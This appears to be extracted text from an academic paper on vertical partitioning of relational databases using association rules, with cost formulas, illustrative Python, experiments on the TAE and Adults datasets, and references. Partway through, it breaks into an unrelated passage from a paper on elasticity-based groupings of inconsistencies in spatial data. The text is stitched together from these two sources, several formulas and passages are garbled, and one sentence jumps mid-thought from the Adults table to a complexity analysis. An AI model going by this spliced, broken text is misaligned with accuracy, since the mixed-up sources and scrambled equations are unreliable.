Cost(q) = 2 \times freq_q \times \sum_{i=1}^{Segment_{qj}} \bigl\lceil M_i \bigl(1 - (1 - 1/M_i)^{k_q}\bigr) \bigr\rceil \qquad (2)
As the insert/delete transactions involve two I/O operations, the cost is multiplied by 2.
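Equations 1 and 2 can be read as a direct procedure: estimate Yao's block count for every partition a transaction touches, add a 10% concatenation overhead per additional partition for retrievals, and double the cost for inserts/deletes. The Python sketch below is only an illustration of that reading; the function and parameter names, and the sample values in the final line, are ours and not the article's.

import math

# Illustrative sketch of Equations 1 and 2 (names and sample values are ours).

def blocks_accessed(m, k):
    # Yao (1977): expected number of blocks touched when k of the tuples,
    # spread uniformly over m blocks, satisfy the query.
    return math.ceil(m * (1 - (1 - 1.0 / m) ** k))

def retrieval_cost(freq, partition_sizes, k, tuples, block_size):
    # Equation 1: sum the block accesses over every partition the query needs,
    # then apply a 10% concatenation overhead per extra partition.
    total_blocks = 0
    for li in partition_sizes:        # li: bytes stored per tuple in partition i (our reading of Li)
        mi = math.ceil(tuples * li / block_size)
        total_blocks += blocks_accessed(mi, k)
    overhead = 1 + 0.1 * (len(partition_sizes) - 1)
    return freq * total_blocks * overhead

def update_cost(freq, partition_sizes, k, tuples, block_size):
    # Equation 2: an insert/delete touches every partition and costs two I/Os.
    total_blocks = 0
    for li in partition_sizes:
        mi = math.ceil(tuples * li / block_size)
        total_blocks += blocks_accessed(mi, k)
    return 2 * freq * total_blocks

# Hypothetical example: a query with frequency 3 touching two partitions of a
# 151-tuple relation (block size 100 bytes), with 15 qualifying tuples.
print(retrieval_cost(freq=3, partition_sizes=[21, 8], k=15, tuples=151, block_size=100))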
Proposed Algorithm for Database Partitioning The rationale behind our algorithm is as follows. Let A and B be the attributes in a relation. If the confidence value of the rule A → B is greater than the predefined minimum (min_conf), then the association between attributes A and B is strong enough that they can be grouped into one partition. Since order of attributes within the same partition is of no significance, confidence values for A → B and B → A are calculated and the lower value will be selected to represent the association between attributes A and B, as a conservative approach. Thus, the confidence (A,B) = freq(A,B) / Max(freq(A), freq(B)). The confidence value is higher when (i) there are fewer transactions requiring attribute A only or B only and/or (ii)
there are more transactions requiring both A and B. Thus, confidence provides further justification, in addition to minimum support (min_supp), for storing attributes A and B in the same partition. The proposed algorithm (see Figure 1) has the following steps: discovering large itemsets, filtering the itemsets, generating data partitions, and selecting the best partitioning scheme. Discovering Large Itemsets: Large itemsets are the combinations of attributes that have support above the predefined minimum support. For a retrieval transaction, the set of attributes in the SELECT clauses are considered; for an INSERT/DELETE transaction, all the attributes in the relation are used. Then large itemsets can be discovered by adapting the Apriori algorithm (Agrawal & Srikant, 1994) and adding transaction frequencies rather than counting transactions. The support of a candidate in Ck is calculated as the sum of the frequencies of the queries that contain the candidate set. The sets of large itemsets Lk are derived that meet the predefined minimum support level (min_supp). Thus, the inputs for this step are the set of database transactions (retrievals and updates) T1..Tm, the transaction frequencies Freq1..Freqm, and the predetermined support level min_supp. The outputs of this module are Large Itemsets L1 .. Lk. Filter Large Itemsets: Large itemsets with confidence value smaller than the predetermined minimum confidence (min_conf) are discarded. For each itemset of Large itemsets Lk, all possible association rules are generated and the corresponding confidence levels are computed. For the association rule LHS → RHS, the confidence level is computed as the total frequency of transactions that have both LHS and RHS divided by the total frequency of transactions that contain LHS. Thus this step takes Large Itemsets (L1 .. Lk) and the predetermined minimum confidence level (min_conf) as inputs and returns Filtered Large Itemsets (L'1 .. L'k). Deriving Vertical Partitions: After we generate Filtered Large itemsets L'1 … L'k, we start
Figure 1. Database partitioning algorithm

Inputs:
  Database Transaction Set T1..Tm
  Frequencies of database transactions: Freq1..Freqm
  Predetermined Minimum Support (min_supp)
  Predetermined Minimum Confidence (min_conf)
Outputs:
  Optimal Database Partitioning Scheme Popt

Step 1: DiscoverLargeItemsets (T1..Tm, Freq1..Freqm, min_supp, L1..Lk)
  Adapt Apriori Algorithm using T1..Tm and Freq1..Freqm
    /* the frequencies are added to determine the support level */
  Generate Large Itemsets L1..Lk with support values >= min_supp

Step 2: FilterLargeItemsets (L1..Lk, min_conf, L'1..L'k)
  Do for each itemset i in L1..Lk
    Calculate all possible confidence values
    Find the lowest confidence (LowConfi)
    IF LowConfi >= min_conf THEN retain itemset i ELSE discard itemset i
  End-Do

Step 3: DeriveVerticalPartitions (L'1..L'k, Partitioning schemes P1..Ps)
  Do for the Itemsets L'k..L'1
    Choose a non-overlapping itemset with the highest support
    Keep into partitioning scheme P
  End-Do

Step 4: FindOptimalPartitioning (T1..Tm, P1..Ps, Popt)
  Do for each database partitioning scheme P ∈ P1..Ps
    Compute Total-Cost(P) = Σq Cost(q) for q ∈ T1..Tm
      /* Cost(q) uses [Eq. 1] if q is Retrieval and [Eq. 2] if q is Update */
    IF Total-Cost(P) < Min-DBCost THEN Min-DBCost ← Total-Cost(P)
  End-Do
  Returns Partitioning scheme Popt, a set of optimal database partitions
from the k-itemsets to determine the partitions. Make a partitioning scheme by picking an itemset from L'k and then picking other itemsets from L'k-1 … L'1, in that order, so that they are disjoint. Continue in this way until the last items are picked from
L’1. This makes one partitioning scheme. Repeat the above process until all possible partitioning schemes are derived. Thus, this module uses Filtered Large Itemsets L’1 …L’k as input and returns partitioning schemes P1..Ps. It should be
noted that each partitioning scheme may comprise several partitions. Find the optimal partitioning scheme: Calculate the database operating cost for a partitioning scheme P by computing the cost of each transaction, using Equation 1 if the transaction is a retrieval and Equation 2 if it is an update. Select the partitioning scheme Popt with the lowest database operating cost. Thus, the inputs for this module are the partitioning schemes P1..Ps and the transaction set T1..Tm, and the output is the optimal partitioning scheme Popt.
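As a rough illustration of Steps 1 and 2, the following Python sketch performs frequency-weighted, Apriori-style itemset discovery and then applies the minimum-confidence filter, using a transaction set like the one in Table 1 below. It is a simplified rendering under our own naming, not the authors' implementation; in particular, the lowest-confidence rule is obtained by dividing by the most frequent single attribute, as in the A → DF example later in the article.

from itertools import combinations

# Simplified sketch of Steps 1-2 (our own rendering, not the authors' code).
transactions = [                               # (attributes used, frequency), cf. Table 1
    ({"A", "B", "E"}, 1),                      # T1
    ({"B", "E"}, 3),                           # T2
    ({"A", "D", "F"}, 3),                      # T3
    ({"A", "B", "C", "D", "E", "F"}, 2),       # T4: INSERT touches every attribute
    ({"A", "B", "C", "D", "E", "F"}, 1),       # T5: DELETE touches every attribute
]

def support(itemset):
    # Support = sum of the frequencies of the transactions containing the itemset.
    return sum(freq for attrs, freq in transactions if itemset <= attrs)

def large_itemsets(attributes, min_supp):
    # Level-wise (Apriori-style) generation: a (k+1)-itemset can only be large
    # if all of its k-subsets are large, so each level extends the previous one.
    levels = []
    current = [frozenset([a]) for a in sorted(attributes)
               if support(frozenset([a])) >= min_supp]
    while current:
        levels.append(current)
        candidates = {a | b for a in current for b in current if len(a | b) == len(a) + 1}
        current = [c for c in candidates
                   if all(frozenset(s) in set(current) for s in combinations(c, len(c) - 1))
                   and support(c) >= min_supp]
    return levels

def lowest_confidence(itemset):
    # The weakest rule X -> itemset\X has the most frequent left-hand side;
    # by anti-monotonicity that is a single attribute (e.g. 6/7 for {A,D,F}).
    return support(itemset) / max(support(frozenset([a])) for a in itemset)

min_supp, min_conf = 4, 0.30
for level in large_itemsets("ABCDEF", min_supp):
    print([set(s) for s in level if lowest_confidence(s) >= min_conf])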
Illustration The following illustrates the working of the partitioning algorithm. Consider the set of 5 transactions T1…T5 and their frequencies to operate on the relation with six attributes (see Table 1).
Generate Large Itemsets Lk Assuming a predetermined minimum support of 40% (i.e., min_supp is 4), Large itemsets Lk are generated by adapting Apriori algorithm. First, the Candidate 1-itemset C1 is derived by adding the frequencies of the transactions in which an attribute is used. For insert and delete transactions, it is assumed that all attributes are used since the entire row is to be accessed. For example, attribute A is used in transactions T1, T3, T4, and T5 with
frequencies 1, 3, 2, and 1 respectively. Thus the support for attribute {A} is 7. Large 1-itemset L1 is derived from Candidate 1-itemset C1 by eliminating itemsets with support < 4. The Candidate 2-itemset C2 is derived by concatenating L1 with L1 and finding the support levels by scanning the Transaction Set. For example, from L1, concatenating {A} and {B}, we find {A B} as one of the 2-itemsets C2. The support level for {A B} is obtained by adding the frequencies of transactions in which both A and B are used. These transactions are T1, T4, and T5 with frequencies 1, 2, and 1, respectively, resulting in the support level of 4 for {A B}. The above process is repeated until all Large itemsets are derived.
Filtering with Predetermined Confidence Levels Each itemset in the Large itemsets is kept only if the itemset has a confidence level >= min_conf. As an example, consider the association {A,D,F}. The confidence value for the rule A → DF is computed as the total frequency of the transactions in which all the attributes A, D, and F are used (i.e., 6) divided by the total frequency of the transactions in which A is used (i.e., 7). Thus, the confidence values for A → DF, D → AF and F → AD are 6/7, 6/6, and 6/6, respectively. Similarly, the confidence values for DF → A, AF → D and AD → F are 6/6, 6/6, and 6/6, respectively. Since the lowest value (6/7 or 86%) is higher than the predefined minimum confidence level (say, min_conf is 30%), the association {A,D,F} is included in the Filtered Large 3-itemsets L'3.
Table 1. Database transaction set

No   Transactions      Frequency
T1   SELECT A, B, E    1
T2   SELECT B, E       3
T3   SELECT A, D, F    3
T4   INSERT SQL        2
T5   DELETE SQL        1

Deriving Vertical Partitions
The large itemset {A,D,F} is taken from L'3 as one of the partitions (see Figure 2); then we go to L'2 to scan the 2-itemsets and find that there is only one, {B E}, that does not overlap with the existing partition. The remaining attribute {C} is taken from L'1, resulting in the partitioning scheme C
Figure 2. Generation of candidate itemsets, large itemsets, and filtered large itemsets

Candidate 1-itemset C1:
Itemset   Support
{A}       7
{B}       7
{C}       3
{D}       6
{E}       7
{F}       6

Large 1-itemset L1:
Itemset   Support
{A}       7
{B}       7
{D}       6
{E}       7
{F}       6
BE ADF. Similarly, considering the other 3-itemset {A,B,E} from L'3, we obtain C DF ABE as the other solution. Of these two partitioning schemes, the one that has the least database operating cost, computed using Equation 1 and Equation 2, is selected as the best database partitioning scheme.
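Continuing the worked example, Step 3 can be mimicked by starting one scheme per filtered 3-itemset and greedily adding disjoint itemsets from the lower filtered levels, covering leftover attributes as singletons. The sketch below is our own illustration (the filtered levels are copied from the example; the helper names are hypothetical) and reproduces the two candidate schemes C BE ADF and C DF ABE.

# Illustrative sketch of Step 3 (our own rendering): build one partitioning
# scheme per top-level itemset by adding non-overlapping itemsets from the
# lower levels, then covering any leftover attributes as singletons.

attributes = set("ABCDEF")
filtered_levels = [                          # L'3, L'2, L'1 from the worked example
    [{"A", "D", "F"}, {"A", "B", "E"}],
    [{"A", "B"}, {"A", "D"}, {"A", "E"}, {"A", "F"}, {"B", "E"}, {"D", "F"}],
    [{"A"}, {"B"}, {"D"}, {"E"}, {"F"}],
]

def schemes(levels, attrs):
    result = []
    for seed in levels[0]:                   # start one scheme per top-level itemset
        partitions, used = [set(seed)], set(seed)
        for level in levels[1:]:
            for itemset in level:
                if not (itemset & used):     # keep only disjoint itemsets
                    partitions.append(set(itemset))
                    used |= itemset
        partitions += [{a} for a in sorted(attrs - used)]   # leftovers, e.g. {C}
        result.append(partitions)
    return result

for scheme in schemes(filtered_levels, attributes):
    print(scheme)    # two schemes: {A,D,F} {B,E} {C} and {A,B,E} {D,F} {C}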
(Figure 2, continued: itemsets and support values for L3, Filtered Large L'1, and Filtered Large L'2.)
IMPLEMENTATION

Experiments have been conducted using the proposed methodology with two real-life databases (UCI, 1999). The first experiment uses the Teaching Assistant Education (TAE) dataset with 6 attributes and 151 tuples. The second experiment uses the Adults database with 15 attributes and 30,162 tuples, which has been used in prior research (Sung, Li, Tan, & Ng, 2003).

First Experiment (with TAE Dataset)

As shown in Table 2, the attributes of the Teaching Assistant Education dataset (UCI, 1999) are Speaker (A), Course_instructor (B), Course (C), Semester (D), Class_size (E), and Class_attribute (F). The block size is assumed to be 100 bytes. We generated 10 SELECT SQL (retrieval), one INSERT SQL and one DELETE SQL (Appendix A). We derived partitions using predefined minimum support levels (20%, 30%, 40%, 50% and 60%) and the predefined confidence levels (20%,
Table 2. TAE database description

Attributes          Type                                             Attribute Length (bytes)
speaker             Nominal: Non-english-speaker, English-speaker    19
course_instructor   Categorical: Range from 1 – 25 categories        2
course              Categorical: Range from 1 – 26 categories        2
semester            Nominal: summer, regular                         7
class_size          Numerical                                        2
class_attribute     Categorical: low, medium, high                   6
Table 3. Result of TAE with minimum support of 20%

Confidence (%)   Attribute Partitioning
20               C  ABDEF
30               E  ABCDF
40               BE  ACDF
50               F  BE  ACD
60               D  BE  ACF
70               C  F  AD  BE
80               B  D  E  F  AC
Optimal Design   F  BE  ACD
30%, 40%, 50%, 60%, 70%, and 80%). Tables 3 through 7 have the results of the partitioning schemes for 20% to 60% support at various confidence levels, while Table 8 has the best solutions for the various support levels. As can be seen from Table 8, the best partitioning design is obtained by the proposed algorithm at the 20% or 30% support level, resulting in an improvement of 493 units (13.62%) over the unpartitioned relation. Our solution matched the optimal design obtained by exhaustive enumeration, which
also has a 13.62% improvement over unpartitioned solution. The optimal solution is: {speaker, course, semester}, {course_instructor, class_size}, {class_attribute} Figure 3 shows the plot of number of partitions and percent cost savings at 20% minimum support level for various confidence levels on TAE database. It can be observed that as the
Table 4. Results on TAE with minimum support of 30%
Table 8. Best partitioning designs for various support levels (TAE database)

Min Support         Best Partitioning Scheme    Total Cost   Cost Reduction
20%                 F  BE  ACD                  3123.40      13.62%
30%                 F  BE  ACD                  3123.40      13.62%
40%                 C  F AD  BE                 3506.00      3.04%
50%                 B  C  D  E  AF              3676.50      -1.67%
60%                 A  B  C  D  E  F            3840.40      -6.21%
Optimal Design      F  BE  ACD                  3123.40      13.62%
Without Partition   ABCDEF                      3616.00
Figure 3. Partitions and cost savings at 20% support level varying confidence (TAE database)
(Chart: X axis = Minimum Confidence (%), from 20 to 80; left Y axis = Cost Savings; right Y axis = No of partitions; series: Cost Savings and Partitions.)
minimum confidence level increases, there are more partitions, because higher confidence results in fewer higher level Large itemsets. Thus there will be several small fragments. It can also be observed that high-cost savings are achieved at 50% minimum confidence. At lower confidence levels, there are fewer fragments resulting in high database costs for retrieval transactions. Similarly, at higher confidence levels, there are many fragments resulting in high cost of insert/delete transactions.
Second Experiment (with Adults Database) The block size of Adults DB (UCI, 1999) is assumed to be 4K. For ease of presentation, the attributes of age, workclass, final-weight, education, education-num, marital-status, occupation, relationship, race, sex, capital-gain, capital-loss,
hours-per-week, native-country and class are labeled as A through O. The Adults database description is given in Table 9. Based on the workload guidelines (Yu et al., 1992), we generate the transaction set for this database (Appendix B). Our partitioning solution represents an enhancement of 41.05% over unpartitioned design (Table 10). The result shows the optimal solutions at 30% and 40% support levels have similar total cost of database operations. Though the total minimum cost should decrease with the increasing minimum support, the minor difference in costs may be attributed to the frequency of transactions. As can be seen from Table 10, the optimal partitioning scheme for Adults database is as follows: {WorkClass} {Final-Weight} {Education}
Table 9. The adults database description (adapted from UCI, 1999)
Nominal: >50, 1 if indexed file is used). Assuming c = 2 on the average, the complexity becomes 2n + 4n^2. Furthermore, there will be additional accesses for creating partitions from the Large Itemsets: n^2(1 + 1/2 + 1/4 + 1/8 + …), or approximately 2n^2. Thus the total computational complexity becomes 6n^2 + 2n, and our algorithm has a time complexity of O(n^2) + O(n), where n is the number of attributes. The complexity of our algorithm is comparable to or better than previous algorithms. For example, the bond energy algorithm (McCormick,
Schweitzer, & White, 1972) has a complexity of O(n^3), the graphical approach (Navathe & Ra, 1989) has a complexity of O(n^2), and the binary partitioning approach (Chu & Ieong, 1993) has a complexity of O(2^m), where m is the number of transactions.
DISCUSSION A new method for attribute partitioning has been proposed based on association rules and applied to two real-life data sets. In the smaller database (TAE), there is an improvement of 13.62% over the unpartitioned relation, matching the optimal solution obtained by exhaustive enumeration. With the larger database (Adults), there is a cost savings of 41.05% over the unpartitioned solution, and the algorithm took less than a second to find the best solution. Our results demonstrate the viability of association rules as an attribute partitioning technique. Following are some remarks regarding the partitioning schemes. The optimal partitioning scheme depends on the transaction mix and database characteristics. Fewer inserts/deletes in the transaction mix result in a more fragmented solution, since the cost of these transactions is high on partitioned relations. Furthermore, the higher the minimum support level, the more fragmented the resulting optimal solution. The higher the minimum confidence level, the more fragmented the partitioning scheme, since only a few itemsets will qualify for the next-level itemsets (see Tables 2-7). Our results using standard workloads indicate that optimal partitioning is obtained at around a 30% support level and a 40%-50% confidence level, which can be used by the database designer in real life. Optionally, the database designer may perform experiments around these support and confidence levels using the most frequent transactions (with the 80/20 rule) and determine optimal fragmentation schemes. The latter procedure is
especially useful when the transaction mix is skewed. The database designers in the real world can use the methodology suggested in this research to determine efficient partitioning schemes. In order to do that, the designer needs to collect data on the transactions (such as, type of transaction – retrievals and updates, frequency of transaction, set of attributes required, and the conditions of retrieval) and the database characteristics (such as, attribute lengths, selectivity of attributes, and number of tuples in each table, and block size). Transaction information may be obtained by studying the reports and screens used by the managers or operating staff in the organization.
FUTURE RESEARCH Present research can be extended in the following directions. First, we use one table at a time for determining partitions, in line with most previous works on vertical partitioning. Join operations can be incorporated into the algorithm by converting those operations to corresponding operations on single tables and applying the algorithm on each table. Transactions using aggregate operators should be weighted more through frequency. Second, the present methodology can be extended to include other physical design techniques, such as access path selection (clustered index, unclustered index, or sequential scan) (Cornell & Yu, 1990; De, Park, & Pirkul, 1988; Song & Gorla, 2000). The cost function needs to be modified to incorporate the chosen access path. Third, we use number of disk accesses as the evaluating cost function in line with most previous research. A better partitioning solution can be obtained when physical characteristics of disk and access characteristics of transactions are incorporated in the cost function (Gorla & Boe, 1990). Fourth, while the scope of present research is determination of disjoint partitions, the research can be extended to include overlapping partitions.
While the present research deals with vertical partitioning solution in centralized relational databases using association rules, the research can be extended to distributed and object-oriented database designs. In distributed databases, user queries originate at various distribution sites and data resides at different locations. The present research can be extended to model the affinity between sites and the required data items using association rules, thereby solving data allocation problems. The solution should provide optimal way to locate various tables and/or attributes across the nodes of a distributed network, so that the user transactions can be processed with the least data transmission costs. In a similar manner, horizontal partitioning of distributed databases can be derived modeling the affinity between tuples and user transactions using association rules. These horizontal partitions can be placed in the most optimal locations, so that communication costs are minimized and parallelism is achieved. In object-oriented databases, the placement of attributes and instances across super type and sub types is a physical design problem (Gorla, 2001). By modeling the associations between instance variables required in the transactions with the subclasses, the physical location of the instance variables in the subclasses can be determined. Thus, by using the association-rule based heuristic, the optimal storage structures for object-oriented databases can be designed, which results in the least database costs of retrieval and update transactions.
REFERENCES Agrawal, R., Mannila, H., Srikant, R., Toivonen, H., & Verkamo, A. I. (1996). Fast discovery of association rules. In Advances in Knowledge Discovery and Data Mining. AAAI/MIT Press.
Agrawal, R., & Srikant, R. (1994). Fast algorithms for mining association rules. In Proceedings of the 20th International Conference on Very Large Databases. Santiago, Chile. Ailamaki, A., Dewitt, D. J., Hill, M. D., & Skounakis, M. (2001). Weaving relations for cache performance. In Proceedings of the 27th VLDB Conference. Bagui, S. (2006). An approach to mining crime patterns. International Journal of Data Warehousing and Mining, 2(1), 50-80. Ceri, S., Navathe, S., & Wiederhold, G. (1983). Distribution design of logical database schemas. IEEE Transactions on Software Engineering, SE-9(4). Chen, M. S., Han, J., & Yu, P. S. (1996). Data mining: An overview from database perspective. IEEE Transactions on Knowledge and Data Engineering, 8(6), 866-883. Chen, Y., Dehne, Y., Eavis, T., & Rau-Chaplin, A. (2006). Improved data partitioning for building large ROLAP data cubes in parallel. International Journal of Data Warehousing and Mining, 2(1),1-26. Cheng, C-H., Lee, W-K., & Wong, K-F. (2002). A genetic algorithm-based clustering approach for database partitioning. IEEE Transactions on Systems, Man, and Cybernetics, 32(3), 215-230. Chu, W. W. & Ieong, I. T. (1993). A transaction-based approach to vertical partitioning for relational database systems. IEEE Transaction on Software Engineering, 19(8), 804-812. Cornell, D. W. & Yu, P. S. (1990). An effective approach to vertical partitioning for physical design of relational databases. IEEE Transactions on Software Engineering, 16(2), 248-258. De, P., Park, J. S., & Pirkul, H. (1988). An integrated model of record segmentation and access
path selection for databases. Information Systems, 13(1), 13-30. Ezeife, C. I. (2001). Selecting and materializing horizontally partitioned warehouse views. Data and Knowledge Engineering, 36, 185-210. Frawley, W. J., Piatetsky-Shapiro, G., & Matheus, C. J. (1991). Knowledge discovery in database: An overview. In G. Piatetsky-Shapiro & W. J. Frawley (Eds.), Knowledge discovery databases. AAAI/MIT Press. Fung, C-W., Karlapalem, K., & Li, Q. (2002). An evaluation of vertical class partitioning for query processing in object-oriented databases. IEEE Transactions on Knowledge and Data Engineering, 14(5), 1095-1118. Furtado, C., Lima, A., Pacitti, E., Valduriez, P., & Mattoso, M. (2005). Physical and virtual partitioning in OLAP database cluster. In Proceedings of the 17th International Symposium on Computer Architecture and High Performance Computing (pp. 143-150). Gorla, N. (2001). An object-oriented database design for improved performance. Data and Knowledge Engineering, 37, 117-138. Gorla, N., & Boe, W. (1990). Effect of schema size on fragmentation design in multirelational databases. Information Systems, 15, 291-301. Hammer, M., & Niamir, B. (1979). A heuristic approach to attribute partitioning. ACM SIGMOD International Conference on Management of Data. Han, J., & Fu, Y. (1999). Mining multiple-level association rules in large databases. IEEE Transactions on Knowledge and Data Engineering, 11(5), 798-805. Hoffer, J. A. (1976). An integer programming formulation of computer database design problems. Information Science, 11, 29-48.
Hoffer, J. A., & Severance, D. G. (1975). The use of cluster analysis in physical data base design. International Conference on Very large Databases. Labio, W. J., Quass, D., & Adelberg, B. (1997). Physical database design for data warehouses. In Proceedings of the IEEE Conference on Data Engineering (pp. 277-288).
Song, S. K., & Gorla, N. (2000). A genetic algorithm for vertical fragmentation and access path selection. The Computer Journal, 45(1), 81-93. Sung, S. Y., Li, Z., Tan, C. L., & Ng, P. A. (2003). Forecasting association rules using existing data sets. IEEE Transactions on Knowledge and Data Engineering, 15(6), 1448-1459.
March, S. T. (1983). Techniques in structuring database records. ACM Computing Surveys, 15(1).
Tjioe, H. C., & Taniar, D. (2005). Mining association rules in data warehouse. International Journal of Data Warehousing and Mining, 1(3), 28-62.
March, S. T., & Rho, S. (1995). Allocating data and operations to nodes in distributed database design. IEEE Trans. on Knowledge and Data Engineering, 7(2).
Tzanis, G., & Berberidis, C. (2007). Mining for mutually exclusive items in transaction databases. International Journal of Data Warehousing and Mining, 3(3).
McCormick, W. T., Jr., Schweitzer, P. J., & White, T. W. (1972). Problem decomposition and data organization by a clustering technique. Operations Research, 20(5), 993-1009.
Yao, S. B. (1977). Approximating block access in data-base organization. Communications of the ACM, 20(4), 260-261.
Navathe, S., Ceri, S., Wiederhold, G., & Dou, J. (1984). Vertical partitioning algorithms for database design. ACM Transactions on. Database Systems. Navathe, S., & Ra, M. (1989). Vertical partitioning for database design: A graphical algorithm. In Proceedings of the 1989 ACM SIGMOD/ Ng, V., Gorla, N., Law, D.M., & Chan, C. K. (2003). Applying genetic algorithms in database partitioning. In Proceedings of the 2003 ACM Symposium on Applied Computing (SAC) (pp. 544-549). Ozsu, M., & Valduriez, P. (1996). Principles of distributed database systems. Prentice Hall. Park, J-S., Chen, M-S., & Yu, P. S. (1995). Mining association rules with adjustable accuracy (IBM research report). Ramamurthy, R., Dewitt, D. J., & Su, Q. (2002). A case for fractured mirrors. In Proceedings of the 28th VLDB Conference.
Yen, S-J., & Chen, A. L. P. (2001). A graph-based approach for discovering various types of association rules. IEEE Transactions on Knowledge and Data Engineering, 12(5), 839-845. Yu, P. S., Chen, M. S., Heiss, H. U., & Lee, S. (1992). Workload characterization of relational database environments. IEEE Transactions of Software Engineering, 18(4), 347-355. UCI. (1999). Machine learning repository content summary. Retrieved February 8, 2008, from http:// www.ics.uci.edu/~mlearn/MLSummary.html Zaki, M. J. (2000). Scalable Algorithms for association mining. IEEE Transactions on Knowledge and Data Engineering, 12(3), 372-390. Zaki, M. J., & Hsiao, C-J. (2005). Efficient algorithms for mining closed itemsets and their lattice structures. IEEE Transactions on Knowledge and Data Engineering, 17(4), 462-478.
APPENDIX A. TRANSACTIONS FOR TAE DATABASE No 1 2 3 4 5 6 7 8 9 10 11 12
Query SELECT speaker, course_instructor, course, semester, class_size WHERE class_size < 5 SELECT speaker, course_instructor, semester, class_size, class_attribute WHERE course 18 SELECT speaker, course, class_attribute WHERE class_size “low”) SELECT speaker, course, semester, class_size, class_attribute WHERE class_size = 64 AND semester = “regular” AND course_instructor >= 5 SELECT course_instructor, class_size WHERE course_instructor = 11 OR class_attribute > “low” OR semester = 39 Number of tuples to be inserted : 1 INSERT SQL Number of tuples to be deleted : 4 DELETE SQL
Freq 2 3 13 15 2 7 15 6 18 10 6 3
APPENDIX B: TRANSACTION SET FOR ADULTS DATABASE

No 1: SELECT ... WHERE Race = "White" AND Age ...

ELSi > 1 would occur only if Ii > Ni, that is, i would have more inconsistent neighbors than neighbors. This is not possible by definition of Ii and Ni.
The higher the elasticity value, the more likely the object is to contribute to the inconsistency. This is the case since an object that is inconsistent with all or many of its neighbors is more likely to be the source of the inconsistency than an object that is inconsistent with relatively few of its neighbors.
Full Elasticity The elasticity of an object may equal 1. ELSi = 1 only when Ii = Ni, that is i is pair-wise inconsistent with all its neighbors.
FORMATION OF ELASTICITY-BASED IPR GROUPINGS (EIGS)
Partial Elasticity
Real world inconsistencies are likely to occur between two or more objects. A technique to group the corresponding objects of a multi-object inconsistency in the spatial representation is required. This can be achieved by grouping objects using knowledge of the IPRs they are part of, as well as their elasticity. Elasticity is used to group IPRs into multi-object structures that correspond to inconsistencies among multiple entities in the real world. The relative contribution of objects to these multi-object inconsistencies is established using elasticity.
The elasticity of an object may be a value between 0 and 1. 0 < ELSi < 1 only when Ii < Ni, that is i is pair-wise inconsistent with at least one but not all of its neighbors.
Example of Elasticity To understand the significance of the elasticity of an object, consider an example where two inconsistent pair-wise relations are detected between three objects i, j, and k, which are neighbors with one another, such that IPRij = T and IPRik = T. No IPR is detected between j, and k, and no additional IPRs are detected between i, j, and k and any other of their neighbors. Suppose i has two neighbors ( j, and k), and j and k each has 6 and 4 neighboring objects, respectively. Then 2 = 1, 2 1 ELSj = , 6
ELSi =
Interpretation of IPRs in Terms of Elasticity A number of observations can be made about an IPR by looking at the elasticity of its member objects. The observations are later used for grouping IPRs into multi-object inconsistencies. Consider a pair of objects Oi and Oj such that IPRij = T. In determining the elasticity of each of the two objects, two types of IPRs are distinguished.
Unbalanced IPR
and 1 4
ELSk = . Since object i is inconsistent with all objects it is neighbors with, it has a high elasticity value. This example is illustrated in Figure 7.
If ELSi > ELSj then object i is referred to as the higher elasticity object and j as the lower elasticity object. This occurs if one of the following conditions is satisfied:
•
•
•
The objects are inconsistent with one another and with no other objects. Object i has fewer neighbors than j. In this scenario we conclude that the object i that has fewer numbers of neighbors N is more likely to be used as the basis for grouping IPRs. Both objects have the same number of neighbors. Object i is inconsistent with more objects then j. In this scenario we conclude that the object, which is inconsistent with more of its neighbors, is more likely to be used as the basis for grouping IPRs. The rate of the number of objects i is inconsistent with, divided by the number of objects it is neighbors with, is greater than the rate of the number of objects j is inconsistent with divided by the number of objects it is neighbors with. In this scenario we conclude that the object with the higher rate is more likely to be used as the basis for grouping IPRs.
Balanced IPR If ELSi = ELSj then objects i and j have the same level of elasticity. This is referred to as a balanced IPR. It occurs if: •
•
•
2694
The objects are inconsistent with one another and with no other objects. Object i has the same number of neighbors as does j. In this scenario, no further grouping is required. Both objects have the same number of neighbors. Object i is inconsistent with the same number of objects as does j. In this scenario additional information is required to determine which object will be used as the basis for grouping IPRs. The number of objects i is inconsistent with, relative to the number of objects it is neighbors with, is the same as the number of objects j is inconsistent with, relative to the number of objects it is neighbors with. In this scenario the object that has a larger
number of IPRs is more likely to be used as the basis for grouping IPRs.
Defining EIGs An elasticity-based IPR grouping (EIG) is a set of one or more objects where the object of highest elasticity in the group forms an IPR with each of the remaining objects in the group.
Example of an EIG To clarify this definition, consider the following situation: Consider three objects i, j, and k that are neighbors with one another, but with no other objects. Let i and j form an inconsistent pair-wise relation IPRij such that ELSi > ELSj. Let i and k form an inconsistent pair-wise relation IPRik such that ELSi > ELSk. Objects i, j, k are said to constitute an inconsistent set since object i has the highest elasticity value among the three objects and it forms an IPR with each of the other two objects. This is referred to as an elasticity-based IPR grouping (EIG) and denote it as ELSijk. This is illustrated in Figure 8.
Detecting EIGs This is extended into a technique to analyze all IPRs in the database and group them into EIGs based on the elasticity of the objects which form the IPRs: • • • •
•
Determine all IPRs. Extract a list of all objects in all IPRs and determine their elasticity values. Sort the list of objects in descending order by elasticity. Sort objects that have the same elasticity values by the number of IPRs they are a part of, that is, Ii in descending order. Create the first empty EIG, to which objects will be assigned.
Introducing Elasticity for Spatial Knowledge Management
Figure 8. A schematic view of an EIG ELSi
ELS j
2 2
1
i
1 2
EIGijk j
k
ELSk
•
•
For each object in the sorted list (whether it has or has not yet been assigned to constructed EIGs): o Determine all IPRs in which this object participates. o For each such IPR: Identify the second object in the IPR. Check the remaining objects in the sorted list (those objects with the same or smaller elasticity values) for occurrence of the second object regardless if they are already part of one or more EIGs. If the second object is found: o Assign the first object to the current EIG (if not assigned before to this EIG). o Assign the second object to the current EIG. o If there are still objects that have not
1 2
yet been assigned to any EIGs, create the next empty EIG to which objects will be assigned. This results in a list of multi-object inconsistencies (EIGs). Each object’s elasticity helps form these inconsistencies. In future work, we will explore how elasticity can be used to assist with object adjustment decisions that would eliminate or reduce the number and complexity of such multi-object inconsistencies.
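The grouping steps above can be summarized in a few lines of code. The following Python sketch is our own simplified reading of the procedure (object identifiers, data structures, and the tie-breaking detail are assumptions), shown on the three-object example of Figure 8:

# Simplified sketch (ours) of the EIG grouping steps described above: sort the
# IPR objects by elasticity (ties broken by IPR count) and grow one EIG at a
# time around the object currently at the top of the list.

def form_eigs(iprs, elasticity):
    # iprs: iterable of frozenset({a, b}) pairs; elasticity: dict object -> ELS value.
    ipr_count = {}
    for pair in iprs:
        for obj in pair:
            ipr_count[obj] = ipr_count.get(obj, 0) + 1
    # Sort by elasticity, breaking ties by the number of IPRs, both descending.
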